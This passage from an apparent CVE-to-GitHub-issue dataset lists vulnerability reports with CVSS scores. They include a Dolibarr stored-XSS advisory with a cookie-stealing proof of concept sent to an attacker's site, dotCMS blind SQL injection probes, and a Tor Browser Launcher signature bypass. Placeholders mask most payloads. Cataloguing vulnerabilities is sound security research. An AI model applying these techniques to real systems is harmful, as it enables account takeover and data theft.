  2192. "description": "XSS vulnerability on latest version. Hi all, I don't think it's a good idea to post this here. But nobody responded to my mail and the Dolibarr Official twitter account advised me to post this here ( URLTAG so ... Here is an advisory about XSS Vulnerability on Dolibarr latest version APITAG Exploit Title: XSS on dolibarr NUMBERTAG Date: PATHTAG Author: Mickael Dorigny @ Synetis Vendor or Software Link: FILETAG Category: XSS Vulnerability description : APITAG A Stored XSS is available in the Dolibarr NUMBERTAG core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it. This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have the right to check other users' attributes. APITAG n NUMBERTAG Stored XSS in user attributes: APITAG Once a simple user is connected with his account, he can modify his attributes like Last name, First name, Mobile number, etc. This information can be reviewed by other users who have administration privileges. Note that some basic protections are present just after form submitting. These protections don't allow an attacker to use basic APITAG tips like \" APITAG \" tags or \"onerror\" APITAG But some other events are still allowed. Using the APITAG HTML tag and the \"onmouseover\" APITAG event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid APITAG instructions in the administrator's browser or in the browser of other users allowed to check users' attributes. 
APITAG : As an authenticated user, fullfill APITAG name\", APITAG name\", \"email\", \"job\" or \"signature\" input with this : user1 APITAG [REQUEST] URLTAG [POSTDATA NUMBERTAG Content Disposition: form data; name=\"token\" APITAG NUMBERTAG Content Disposition: form data; name=\"action\" update NUMBERTAG Content Disposition: form data; name=\"entity NUMBERTAG Content Disposition: form data; name=\"lastname\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"firstname\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"job\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"gender\" man NUMBERTAG Content Disposition: form data; name=\"login\" user NUMBERTAG Content Disposition: form data; name=\"password\" user NUMBERTAG Content Disposition: form data; name=\"admin NUMBERTAG Content Disposition: form data; name=\"superadmin NUMBERTAG Content Disposition: form data; name=\"office_phone NUMBERTAG Content Disposition: form data; name=\"user_mobile NUMBERTAG Content Disposition: form data; name=\"office_fa NUMBERTAG Content Disposition: form data; name=\"email\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"signature\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"fk_user NUMBERTAG Content Disposition: form data; name=\"weeklyhours NUMBERTAG Content Disposition: form data; name=\"save\" Save NUMBERTAG Note that APITAG name\" and APITAG name\" input are displayed in the APITAG of users\" page, but they are truncated after NUMBERTAG characters. This trunctation limits available XSS payloads. We can use the \"signature\" input to insert more APITAG instructions in the same HTML form. Admin will then see this signature when they will click on a user in the APITAG of users\" to see all his attributes. Image insertion can target an existent or a non existent image. 
A little tips to have more chance to trap an admin is to upload a very big image (like NUMBERTAG that will cover all the website page. Once attributes are modified. Another user like an admin can check your attributes and then execute APITAG instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled by an attacker using a GET HTTP request. Inject this payload in the \"signature\" input : APITAG Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies. This is a APITAG Video made by myself to expose the most dangerous usage of this vulnerability : URLTAG Feel free to ask more details if needed.",
  2193. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  2194. "severity": "MEDIUM",
  2195. "baseScore": 5.4,
  2196. "impactScore": 2.7,
  2197. "exploitabilityScore": 2.3
  2198. },
  2199. {
  2200. "CVE_ID": "CVE-2016-2169",
  2201. "Issue_Url_old": "https://github.com/cloudfoundry/cloud_controller_ng/issues/568",
  2202. "Issue_Url_new": "https://github.com/cloudfoundry/cloud_controller_ng/issues/568",
  2203. "Repo_new": "cloudfoundry/cloud_controller_ng",
  2204. "Issue_Created_At": "2016-03-23T13:54:24Z",
  2205. "description": "CAPI shouldn't allow users to create apps with routes matching CF service subdomains. Today we stumbled upon a very interesting bug within CAPI, which I spoke about with MENTIONTAG on the APITAG APITAG Source) Slack. We were experiencing HTTP ERRORTAG errors approximately NUMBERTAG of the time when connecting to the UAA via the CF CLI. We also had similar errors with one of our internal services using the cf java client URLTAG , which gave us errors such as ERRORTAG Turns out that one of our users has created an app with route APITAG , and that caused this behaviour. Since you can have multiple apps with the same domain bound on it, CF is nicely load balancing traffic to the 'real' APITAG (the UAA) and the user's app, which makes this fail the NUMBERTAG of the time my CF CLI or APITAG hits the user's app instead of the actual UAA. In our case, the user was not a malicious user, but it would be pretty straight forward to inject a APITAG Always\u201d application that listens on the same route as the UAA, which would then catch/receive UAA APITAG tokens. In the case of the APITAG (and also the CF CLI) I think it makes sense they don't block this kind of behaviour, as they will just act as a pure passthrough for anything you request. However, I believe that CF should block the ability to use the same route as the UAA though for security reasons. In a default (stock) CF release installation, we believe this should (probably) at least be blocked for these CF service subdomains, if this has not already been done: APITAG APITAG / APITAG APITAG APITAG APITAG We think that this might be a CAPI (security) issue. MENTIONTAG will also ask MENTIONTAG about this in person.",
  2206. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  2207. "severity": "MEDIUM",
  2208. "baseScore": 5.3,
  2209. "impactScore": 1.4,
  2210. "exploitabilityScore": 3.9
  2211. },
  2212. {
  2213. "CVE_ID": "CVE-2016-2183",
  2214. "Issue_Url_old": "https://github.com/ssllabs/ssllabs-scan/issues/387",
  2215. "Issue_Url_new": "https://github.com/ssllabs/ssllabs-scan/issues/387",
  2216. "Repo_new": "ssllabs/ssllabs-scan",
  2217. "Issue_Created_At": "2016-08-24T16:38:48Z",
  2218. "description": "SWEET NUMBERTAG triple DES should now be considered as \u201cbad\u201d as RC4. URLTAG I think NUMBERTAG DES should be flagged INSECURE, as RC4 is.",
  2219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2220. "severity": "HIGH",
  2221. "baseScore": 7.5,
  2222. "impactScore": 3.6,
  2223. "exploitabilityScore": 3.9
  2224. },
  2225. {
  2226. "CVE_ID": "CVE-2016-2230",
  2227. "Issue_Url_old": "https://github.com/RasPlex/RasPlex/issues/453",
  2228. "Issue_Url_new": "https://github.com/rasplex/rasplex/issues/453",
  2229. "Repo_new": "rasplex/rasplex",
  2230. "Issue_Created_At": "2015-12-27T13:27:27Z",
  2231. "description": "SSH insecure by default. SSH is enabled by default, the default login details are widely published. People are exposing their APITAG installs to the web. Even if they aren't putting them in a DMZ, or otherwise exposing them to the web, it's still horribly insecure by default. Bizarrely, you're prevented from changing the default password because passwd is missing. Possible solutions: a) Make SSH off by default, force a password to be set the first time SSH is enabled b) Generate a random password and show it in settings.",
  2232. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2233. "severity": "CRITICAL",
  2234. "baseScore": 9.8,
  2235. "impactScore": 5.9,
  2236. "exploitabilityScore": 3.9
  2237. },
  2238. {
  2239. "CVE_ID": "CVE-2016-2355",
  2240. "Issue_Url_old": "https://github.com/dotCMS/core/issues/8848",
  2241. "Issue_Url_new": "https://github.com/dotcms/core/issues/8848",
  2242. "Repo_new": "dotcms/core",
  2243. "Issue_Created_At": "2016-04-08T02:58:46Z",
  2244. "description": "SQL Injection Vulnerability. Attack details url: URLTAG APITAG URL encoded POST input APITAG was set to NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG Tests performed NUMBERTAG OR NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG APITAG FALSE NUMBERTAG OR NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE Original value: APITAG Parameter: APITAG (POST) Type: boolean based blind Title: AND boolean based blind WHERE or HAVING clause Payload: APITAG EMAILTAG APITAG AND NUMBERTAG AND APITAG",
  2245. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2246. "severity": "CRITICAL",
  2247. "baseScore": 9.8,
  2248. "impactScore": 5.9,
  2249. "exploitabilityScore": 3.9
  2250. },
  2251. {
  2252. "CVE_ID": "CVE-2016-2515",
  2253. "Issue_Url_old": "https://github.com/hueniverse/hawk/issues/168",
  2254. "Issue_Url_new": "https://github.com/mozilla/hawk/issues/168",
  2255. "Repo_new": "mozilla/hawk",
  2256. "Issue_Created_At": "2016-01-19T19:53:51Z",
  2257. "description": "Long headers or uris can cause minor APITAG Reported by MENTIONTAG",
  2258. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2259. "severity": "HIGH",
  2260. "baseScore": 7.5,
  2261. "impactScore": 3.6,
  2262. "exploitabilityScore": 3.9
  2263. },
  2264. {
  2265. "CVE_ID": "CVE-2016-3180",
  2266. "Issue_Url_old": "https://github.com/micahflee/torbrowser-launcher/issues/229",
  2267. "Issue_Url_new": "https://github.com/micahflee/torbrowser-launcher/issues/229",
  2268. "Repo_new": "micahflee/torbrowser-launcher",
  2269. "Issue_Created_At": "2016-03-13T21:49:44Z",
  2270. "description": "Signature verification bypass attack. Jann Horn reported a clever security issue that lets an attacker bypass PGP signature verification. Because Tor Browser Launcher uses defense in depth, an attacker would need to combine this attack with other attacks before they could succeed in an exploit. Specifically, they would need to be in a position to man in the middle the download and also defeat the HTTPS connection to FILETAG or one of the mirrors. The first time you run Tor Browser Launcher, it works like this: Downloads URLTAG to learn the current stable version of Tor Browser Uses the version, as well as the mirror URL (defaults to URLTAG to build URLs to download the APITAG file (I'll call it $tarball) and APITAG ($sigfile), and downloads them both Verifies the signature by running: APITAG The problem is that APITAG can be ambiguous. If $sigfile is APITAG , it can either mean that it's a detached signature and the content is in APITAG , or it can mean that the content is included in the same file. If an attacker can MITM connections to FILETAG or whatever mirror is set, and their MITM server uses a trusted certificate, then they can replace $sigfile with a single file that contains the valid Tor Browser tarball and signature, and replace $tarball with something malicious but completely unsigned. When Tor Browser Launcher downloads $sigfile and verifies it, the verification will succeed and it will extract $tarball and execute APITAG , which will let the attacker run their arbitrary code as the current user (they could even launch a legit Tor Browser if they want to be stealthy). The solution is to specify the content as well as the signature file when verifying the signature, e.g.: APITAG",
  2271. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2272. "severity": "HIGH",
  2273. "baseScore": 8.1,
  2274. "impactScore": 5.9,
  2275. "exploitabilityScore": 2.2
  2276. },
  2277. {
  2278. "CVE_ID": "CVE-2016-3182",
  2279. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/725",
  2280. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/725",
  2281. "Repo_new": "uclouvain/openjpeg",
  2282. "Issue_Created_At": "2016-03-16T10:05:18Z",
  2283. "description": "Heap Corruption in opj_free function. URLTAG URLTAG",
  2284. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2285. "severity": "MEDIUM",
  2286. "baseScore": 5.5,
  2287. "impactScore": 3.6,
  2288. "exploitabilityScore": 1.8
  2289. },
  2290. {
  2291. "CVE_ID": "CVE-2016-3183",
  2292. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/726",
  2293. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/726",
  2294. "Repo_new": "uclouvain/openjpeg",
  2295. "Issue_Created_At": "2016-03-16T10:05:56Z",
  2296. "description": "Out Of Bounds Read in sycc NUMBERTAG to_rgb function. URLTAG URLTAG",
  2297. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2298. "severity": "MEDIUM",
  2299. "baseScore": 5.5,
  2300. "impactScore": 3.6,
  2301. "exploitabilityScore": 1.8
  2302. },
  2303. {
  2304. "CVE_ID": "CVE-2016-3674",
  2305. "Issue_Url_old": "https://github.com/x-stream/xstream/issues/25",
  2306. "Issue_Url_new": "https://github.com/x-stream/xstream/issues/25",
  2307. "Repo_new": "x-stream/xstream",
  2308. "Issue_Created_At": "2015-09-07T08:53:09Z",
  2309. "description": "XXE vulnerability. DTD processing was enabled and therefore the XML deserialization process was vulnerable to XML External Entity Injection (I was able to expose local files). URLTAG Suggestion is to ignore client side DOCTYPE declarations.",
  2310. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2311. "severity": "HIGH",
  2312. "baseScore": 7.5,
  2313. "impactScore": 3.6,
  2314. "exploitabilityScore": 3.9
  2315. },
  2316. {
  2317. "CVE_ID": "CVE-2016-3697",
  2318. "Issue_Url_old": "https://github.com/docker/docker/issues/21436",
  2319. "Issue_Url_new": "https://github.com/moby/moby/issues/21436",
  2320. "Repo_new": "moby/moby",
  2321. "Issue_Created_At": "2016-03-23T18:08:09Z",
  2322. "description": "Numeric user id passed to user interpreted as user name if user name is numeric in container /etc/passwd. Output of docker version : CODETAG Output of docker info : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): Running under APITAG through Vagrant. Steps to reproduce the issue NUMBERTAG On docker host: APITAG NUMBERTAG In the just started container: APITAG NUMBERTAG In another terminal on the same docker host: APITAG Describe the results you received: APITAG Describe the results you expected: It should show my user id as NUMBERTAG not NUMBERTAG Additional information you deem important (e.g. issue happens only occasionally): This could let image creators create malicious images which when run with a specific user id grant root in the container, and thus root to any mounted volumes.",
  2323. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  2324. "severity": "HIGH",
  2325. "baseScore": 7.8,
  2326. "impactScore": 5.9,
  2327. "exploitabilityScore": 1.8
  2328. },
  2329. {
  2330. "CVE_ID": "CVE-2016-3735",
  2331. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/470",
  2332. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/470",
  2333. "Repo_new": "piwigo/piwigo",
  2334. "Issue_Created_At": "2016-04-26T09:03:40Z",
  2335. "description": "increase randomness on generate_key. Current functions used to generate random strings are not \"that much random\" (depending on the PHP version and operating system).",
  2336. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2337. "severity": "HIGH",
  2338. "baseScore": 8.1,
  2339. "impactScore": 5.9,
  2340. "exploitabilityScore": 2.2
  2341. },
  2342. {
  2343. "CVE_ID": "CVE-2016-3956",
  2344. "Issue_Url_old": "https://github.com/npm/npm/issues/8380",
  2345. "Issue_Url_new": "https://github.com/npm/npm/issues/8380",
  2346. "Repo_new": "npm/npm",
  2347. "Issue_Created_At": "2015-05-27T22:30:34Z",
  2348. "description": "npm uses auth token from registry on http[s]:// dependencies, breaking APITAG URLs. APITAG Excerpt from the log: APITAG further: ERRORTAG Removing auth token with npm logout helps. Apparently APITAG server reacts badly to foreign auth tokens. This issue has not been observed with npm NUMBERTAG",
  2349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2350. "severity": "HIGH",
  2351. "baseScore": 7.5,
  2352. "impactScore": 3.6,
  2353. "exploitabilityScore": 3.9
  2354. },
  2355. {
  2356. "CVE_ID": "CVE-2016-3958",
  2357. "Issue_Url_old": "https://github.com/golang/go/issues/14959",
  2358. "Issue_Url_new": "https://github.com/golang/go/issues/14959",
  2359. "Repo_new": "golang/go",
  2360. "Issue_Created_At": "2016-03-25T06:40:00Z",
  2361. "description": "syscall: guard against Windows DLL preloading attacks . Taru Karttunen noted that Go should be more paranoid by default when loading DLLs. Background: URLTAG Microsoft's guidelines: FILETAG APITAG docs: FILETAG MENTIONTAG proposed NUMBERTAG Change APITAG to call APITAG with APITAG instead of calling APITAG That is, APITAG is now secure by default and cannot load DLLs from the directory containing the executable NUMBERTAG Add a APITAG to PATHTAG so that users can still get at the old behavior if they want it (by appropriate passing of flags). CL forthcoming. /cc MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG",
  2362. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  2363. "severity": "HIGH",
  2364. "baseScore": 7.8,
  2365. "impactScore": 5.9,
  2366. "exploitabilityScore": 1.8
  2367. },
  2368. {
  2369. "CVE_ID": "CVE-2016-3995",
  2370. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/146",
  2371. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/146",
  2372. "Repo_new": "weidai11/cryptopp",
  2373. "Issue_Created_At": "2016-03-11T11:00:05Z",
  2374. "description": "Timing Attack Counter Measure AES. For both APITAG and APITAG there is some code to avoid timing attacks: ERRORTAG As far as I understand it, the goal is to do at least one read per cache line in order to preload Te into the cache. However, when looking at the NUMBERTAG binary (obtained in the Debian package URLTAG ), I noticed that although the loop structure remains, the memory reads have been optimized away: CODETAG This countermeasure seems to be removed by the compiler. Hence, the binary may be vulnerable to timing attacks.",
  2375. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2376. "severity": "HIGH",
  2377. "baseScore": 7.5,
  2378. "impactScore": 3.6,
  2379. "exploitabilityScore": 3.9
  2380. },
  2381. {
  2382. "CVE_ID": "CVE-2016-4040",
  2383. "Issue_Url_old": "https://github.com/dotCMS/core/issues/8840",
  2384. "Issue_Url_new": "https://github.com/dotcms/core/issues/8840",
  2385. "Repo_new": "dotcms/core",
  2386. "Issue_Created_At": "2016-04-07T12:12:18Z",
  2387. "description": "Further sortby sanitizing. We missed a single case when sanitizing the accepted sort by values in the workflow portlet.",
  2388. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  2389. "severity": "HIGH",
  2390. "baseScore": 7.2,
  2391. "impactScore": 5.9,
  2392. "exploitabilityScore": 1.2
  2393. },
  2394. {
  2395. "CVE_ID": "CVE-2016-4074",
  2396. "Issue_Url_old": "https://github.com/stedolan/jq/issues/1136",
  2397. "Issue_Url_new": "https://github.com/stedolan/jq/issues/1136",
  2398. "Repo_new": "stedolan/jq",
  2399. "Issue_Created_At": "2016-04-24T08:31:16Z",
  2400. "description": "Stack exhaustion parsing a JSON file. Hi, A crash caused by stack exhaustion parsing a JSON was found. It affects, at least version NUMBERTAG as well as the last git revision. To reproduce: $ gdb PATHTAG args jq . APITAG ... Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff NUMBERTAG fa7c2 in _IO_new_file_overflow (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , ch NUMBERTAG at APITAG NUMBERTAG fileops.c: No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG fa7c2 in _IO_new_file_overflow (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , ch NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG a1 in _IO_new_file_xsputn (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , data=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG eee6d in __GI__IO_fwrite (buf=<optimized out>, size NUMBERTAG count NUMBERTAG fp NUMBERTAG ffff4b3f NUMBERTAG APITAG ) at APITAG NUMBERTAG in put_buf (s NUMBERTAG fffff7ff0cc NUMBERTAG len NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG is_tty NUMBERTAG at APITAG NUMBERTAG c in put_char (c NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG T NUMBERTAG at APITAG NUMBERTAG ab1 in put_indent (n NUMBERTAG flags NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG T NUMBERTAG at APITAG NUMBERTAG e in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG APITAG stack frames follow...) 
Find attached a compressed JSON file to reproduce it (the total size of this file is NUMBERTAG kb, but it should be compressed in order to upload it here) Regards, Gustavo.",
  2401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2402. "severity": "HIGH",
  2403. "baseScore": 7.5,
  2404. "impactScore": 3.6,
  2405. "exploitabilityScore": 3.9
  2406. },
  2407. {
  2408. "CVE_ID": "CVE-2016-4074",
  2409. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/10263",
  2410. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/10263",
  2411. "Repo_new": "hashicorp/consul",
  2412. "Issue_Created_At": "2021-05-20T06:33:50Z",
  2413. "description": "Vulnerability CVETAG on jq. Overview of the Issue Security tool scanned the APITAG NUMBERTAG docker image and found the following CVE: CVETAG Reproduction Steps Steps to reproduce this issue NUMBERTAG Get latest APITAG NUMBERTAG docker image (we tested both latest and NUMBERTAG Use a security tool to scan for CVEs Environment Kubernetes version: AKS NUMBERTAG consul version NUMBERTAG and NUMBERTAG Security scan result Fixable CVETAG (CVSS NUMBERTAG found in component 'jq' (version NUMBERTAG r0) in container 'consul', resolved by version NUMBERTAG rc1 r0",
  2414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2415. "severity": "HIGH",
  2416. "baseScore": 7.5,
  2417. "impactScore": 3.6,
  2418. "exploitabilityScore": 3.9
  2419. },
  2420. {
  2421. "CVE_ID": "CVE-2016-4300",
  2422. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/718",
  2423. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/718",
  2424. "Repo_new": "libarchive/libarchive",
  2425. "Issue_Created_At": "2016-06-19T21:19:37Z",
  2426. "description": "Security Issue NUMBERTAG Placeholder for a security issue that is being investigated. A fix will be committed shortly.",
  2427. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2428. "severity": "HIGH",
  2429. "baseScore": 7.8,
  2430. "impactScore": 5.9,
  2431. "exploitabilityScore": 1.8
  2432. },
  2433. {
  2434. "CVE_ID": "CVE-2016-4302",
  2435. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/719",
  2436. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/719",
  2437. "Repo_new": "libarchive/libarchive",
  2438. "Issue_Created_At": "2016-06-19T21:21:21Z",
  2439. "description": "Security issue NUMBERTAG Placeholder for a security issue that is being investigated. A fix will be committed soon.",
  2440. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2441. "severity": "HIGH",
  2442. "baseScore": 7.8,
  2443. "impactScore": 5.9,
  2444. "exploitabilityScore": 1.8
  2445. },
  2446. {
  2447. "CVE_ID": "CVE-2016-4425",
  2448. "Issue_Url_old": "https://github.com/akheron/jansson/issues/282",
  2449. "Issue_Url_new": "https://github.com/akheron/jansson/issues/282",
  2450. "Repo_new": "akheron/jansson",
  2451. "Issue_Created_At": "2016-05-01T19:56:44Z",
  2452. "description": "Stack exhaustion parsing a JSON file. Hi, A crash caused by stack exhaustion parsing a JSON was found. It affects, at least version NUMBERTAG as well as the last git revision (and maybe others). To reproduce using jshon: $ python c 'print NUMBERTAG FILETAG $ gdb args ./jshon F FILETAG ... Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff4e NUMBERTAG in ?? () from PATHTAG (gdb) bt NUMBERTAG ffff4e NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff4e NUMBERTAG b7d in ?? () from PATHTAG NUMBERTAG ffff4e NUMBERTAG in malloc () from PATHTAG NUMBERTAG c NUMBERTAG in jsonp_malloc (size NUMBERTAG at APITAG NUMBERTAG f NUMBERTAG in json_array () at APITAG NUMBERTAG afd0 in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error 
NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG APITAG stack frames follow...)",
  2453. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2454. "severity": "HIGH",
  2455. "baseScore": 7.5,
  2456. "impactScore": 3.6,
  2457. "exploitabilityScore": 3.9
  2458. },
  2459. {
  2460. "CVE_ID": "CVE-2016-4552",
  2461. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/5240",
  2462. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/5240",
  2463. "Repo_new": "roundcube/roundcubemail",
  2464. "Issue_Created_At": "2016-05-05T15:24:19Z",
  2465. "description": "Map Area Persistent XSS Vulnerability in mail content page, please confirm. Steps to reproduce: Compose email content via HTML APITAG can use email sending tool or other webmail to send APITAG HTML content is below: APITAG Send the mail to roundcube mail system Log in to roundcube mail system and open the mail received Click the area near the image in the APITAG xss will be triggered The vulnerability can be triggered in APITAG The testing roundcube webmail version is APITAG is below: FILETAG The test screenshot link: URLTAG",
  2466. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2467. "severity": "MEDIUM",
  2468. "baseScore": 6.1,
  2469. "impactScore": 2.7,
  2470. "exploitabilityScore": 2.8
  2471. },
  2472. {
  2473. "CVE_ID": "CVE-2016-4629",
  2474. "Issue_Url_old": "https://github.com/openexr/openexr/issues/563",
  2475. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/563",
  2476. "Repo_new": "academysoftwarefoundation/openexr",
  2477. "Issue_Created_At": "2019-09-20T17:39:21Z",
  2478. "description": "CVETAG and CVETAG . These appear to be issues with improper use of the APITAG code, not vulnerabilities in the APITAG code itself, and both appear to be have been addressed by Apple in the OS.",
  2479. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2480. "severity": "CRITICAL",
  2481. "baseScore": 9.8,
  2482. "impactScore": 5.9,
  2483. "exploitabilityScore": 3.9
  2484. },
  2485. {
  2486. "CVE_ID": "CVE-2016-4796",
  2487. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/774",
  2488. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/774",
  2489. "Repo_new": "uclouvain/openjpeg",
  2490. "Issue_Created_At": "2016-05-06T06:08:07Z",
  2491. "description": "Heap Buffer Overflow in function color_cmyk_to_rgb of color.c. Title APITAG Heap Buffer Overflow in function color_cmyk_to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
